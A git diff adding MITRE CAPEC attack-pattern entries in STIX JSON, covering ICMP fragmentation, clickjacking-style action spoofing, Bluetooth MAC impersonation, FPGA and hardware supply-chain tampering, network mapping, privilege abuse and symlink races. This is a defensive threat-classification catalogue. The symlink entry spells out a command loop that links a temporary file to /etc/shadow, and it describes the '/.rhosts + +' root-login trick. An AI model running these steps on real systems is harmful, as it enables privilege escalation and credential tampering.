determined to be an unnecessary layer of abstraction. Please refer to the standard level pattern CAPEC-312 : Active OS Fingerprinting going forward, or to any of the detailed patterns that are children of CAPEC-312.", + "external_references": [ + { + "external_id": "CAPEC-315", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/315.html" + } + ], + "id": "attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: TCP/IP Fingerprinting Probes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json new file mode 100644 index 0000000000000000000000000000000000000000..4ef7d59f4e14d9d0cf00e4208479cad4badb3724 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json @@ -0,0 +1,55 @@ +{ + "id": "bundle--4309b9b6-ee3a-464b-ae26-2ece2c52e207", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.", + "external_references": [ + { + "external_id": "CAPEC-496", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/496.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "ICMP Attacks Illustrated", + "external_id": "REF-425", + "source_name": "reference_from_CAPEC", + "url": "http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats" + } + ], + "id": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "modified": "2019-04-04T00:00:00.000Z", + "name": "ICMP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json new file mode 100644 index 0000000000000000000000000000000000000000..6bf2a2df4494c74fd46d405ca90a2a70b207f31b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json @@ -0,0 +1,61 @@ +{ + "id": "bundle--4670c8ed-cd53-43cc-9486-83c4b0e8c3ce", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Adversaries may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user's natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface.", + "external_references": [ + { + "external_id": "CAPEC-173", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Action Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Confidentiality": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Integrity": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "attack-pattern--79309efd-dd13-41d2-81c6-ec382bced2b4" + ], + "x_capec_prerequisites": [ + "The adversary must convince the victim into performing the decoy action.", + "The adversary must have the means to control a user's interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the adversary be able to host (or control) content that the user visits." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json new file mode 100644 index 0000000000000000000000000000000000000000..757c148fa4319e1b338c37a24eb2556755676d8a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json @@ -0,0 +1,56 @@ +{ + "id": "bundle--2efd14dc-d21c-4fb7-bb58-e90fb74670f2", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.", + "external_references": [ + { + "external_id": "CAPEC-667", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/667.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + } + ], + "id": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Bluetooth Impersonation AttackS (BIAS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [], + "Integrity": [] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find disguise and target: The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.

    2. Techniques
    Knowledge of a trusted MAC address.
    Scanning for devices other than the target that may be trusted.

Experiment

  1. Disguise: Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target.

Exploit

  1. Use device capabilities to accomplish goal: Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target's capabilities and connections.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Knowledge of a target device's list of trusted connections." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be in close proximity to Bluetooth devices." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json new file mode 100644 index 0000000000000000000000000000000000000000..630aa0c323116a92fefb55783d6d75a93ff90d7d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json @@ -0,0 +1,75 @@ +{ + "id": "bundle--5a4e685d-dff4-4302-a2e3-0ef4233edf29", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation.\n ", + "external_references": [ + { + "external_id": "CAPEC-674", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/674.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Design for FPGA Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker’s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed." + ], + "x_capec_skills_required": { + "High": "An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json new file mode 100644 index 0000000000000000000000000000000000000000..30db09edd924919aa8416b4218ffe87d24f3536d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json @@ -0,0 +1,96 @@ +{ + "id": "bundle--ce8bea14-6508-487b-85ab-a64854210a58", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in scanning activities to map network nodes, hosts, devices, and routes. Adversaries usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute.", + "external_references": [ + { + "external_id": "CAPEC-309", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Network Configuration Discovery", + "external_id": "T1016", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1016" + }, + { + "description": "System Network Connections Discovery", + "external_id": "T1049", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1049" + }, + { + "description": "Gather Victim Network Information", + "external_id": "T1590", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1590" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Network Topology Mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304", + "attack-pattern--88933ba2-fe2a-4b71-ac08-2537c5903b2e", + "attack-pattern--93f8b21a-7680-4813-8b4b-2976f5765320", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_resources_required": [ + "Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json new file mode 100644 index 0000000000000000000000000000000000000000..0849b13ac141fb9344d385ff790fc0bf834766c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json @@ -0,0 +1,96 @@ +{ + "id": "bundle--a589d812-39ff-4309-aa4e-3d165d25e01e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.", + "external_references": [ + { + "external_id": "CAPEC-122", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1317", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1317.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Privilege Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Improperly configured account privileges allowed unauthorized users on a hospital's network to access the medical records for over 3,000 patients. Thus compromising data integrity and confidentiality in addition to HIPAA violations.\n " + ], + "x_capec_extended_description": "\n If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts.\n This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac", + "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7" + ], + "x_capec_prerequisites": [ + "The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.", + "The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The ability to access the target is required." + ], + "x_capec_skills_required": { + "Low": "Adversary can leverage privileged features they already have access to without additional effort or skill. Adversary is only required to have access to an account with improper priveleges." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json new file mode 100644 index 0000000000000000000000000000000000000000..51e275adf8c56abeccc20523a2353959e5991f90 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json @@ -0,0 +1,58 @@ +{ + "id": "bundle--7d59d3b5-74bc-44b8-b2dc-de4c20f48241", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-531", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/531.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + } + ], + "id": "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker has access to an organization's warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim's security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2" + ], + "x_capec_prerequisites": [ + "Physical access to the system or the integration facility where hardware components are kept." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json new file mode 100644 index 0000000000000000000000000000000000000000..54e95a69aa69be165bd7237104272a9346c9e623 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json @@ -0,0 +1,106 @@ +{ + "id": "bundle--9b3910d2-98fd-496c-8a0b-3ca441c5ffcc", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.", + "external_references": [ + { + "external_id": "CAPEC-27", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/27.html" + }, + { + "external_id": "CWE-367", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/367.html" + }, + { + "external_id": "CWE-61", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/61.html" + }, + { + "external_id": "CWE-662", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/662.html" + }, + { + "external_id": "CWE-689", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/689.html" + }, + { + "external_id": "CWE-667", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/667.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-115", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Symlink_race" + }, + { + "description": "mkstemp (IEEE Std 1003.1, 2004 Edition), The Open Group Base Specifications Issue 6", + "external_id": "REF-116", + "source_name": "reference_from_CAPEC", + "url": "http://www.opengroup.org/onlinepubs/009695399/functions/mkstemp.html" + } + ], + "id": "attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Leveraging Race Conditions via Symbolic Links", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3da1844e-c905-420a-9179-260356a85a05" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For \"efficiency,\" it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.\n The directory /tmp is world-writable. The malicious user creates a symbolic link to the file /.rhosts named /tmp/foo. Then, they invokes foo with \"user\" as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (e.g. \"user password\")) in it. It removes the temporary file (merely removing the symbolic link).\n Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.\n [REF-115]\n ", + "GNU \"ed\" utility (before 0.3) allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. See also: CVE-2006-6939", + "OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. See also: CVE-2005-0894", + "Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. See also: CVE-2000-0972" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Verify that target host's platform supports symbolic links.: This attack pattern is only applicable on platforms that support symbolic links.

    2. Techniques
    Research target platform to determine whether it supports symbolic links.
    Create a symbolic link and ensure that it works as expected on the given platform.

  2. Examine application's file I/O behavior: Analyze the application's file I/O behavior to determine where it stores files, as well as the operations it performs to read/write files.

    3. Techniques
    Use kernel tracing utility such as ktrace to monitor application behavior.
    Use debugging utility such as File Monitor to monitor the application's filesystem I/O calls
    Watch temporary directories to see when temporary files are created, modified and deleted.
    Analyze source code for open-source systems like Linux, Apache, etc.

Experiment

  1. Verify ability to write to filesystem: The attacker verifies ability to write to the target host's file system.

    2. Techniques
    Create a file that does not exist in the target directory (e.g. \"touch temp.txt\" in UNIX-like systems)
    On platforms that differentiate between file creation and file modification, if the target file that the application writes to already exists, attempt to modify it.
    Verify permissions on target directory

Exploit

  1. Replace file with a symlink to a sensitive system file.: Between the time that the application checks to see if a file exists (or if the user has access to it) and the time the application actually opens the file, the attacker replaces the file with a symlink to a sensitive system file.

    2. Techniques
    Create an infinite loop containing commands such as \"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\". Wait for an instance where the following steps occur in the given order: (1) Application ensures that tempfile.dat exists and that the user has access to it, (2) \"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\", and (3) Application opens tempfile.dat for writing, and inadvertently opens /etc/shadow for writing instead.
    Use other techniques with debugging tools to replace the file between the time the application checks the file and the time the application opens it.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The attacker is able to create Symlink links on the target host.", + "Tainted data from the attacker is used and copied to temporary files.", + "The target host does insecure temporary file creation." + ], + "x_capec_skills_required": { + "Medium": "This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json new file mode 100644 index 0000000000000000000000000000000000000000..acf04b7aeb3eb3c5a806f7fc219d7bb56db1542d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json @@ -0,0 +1,50 @@ +{ + "id": 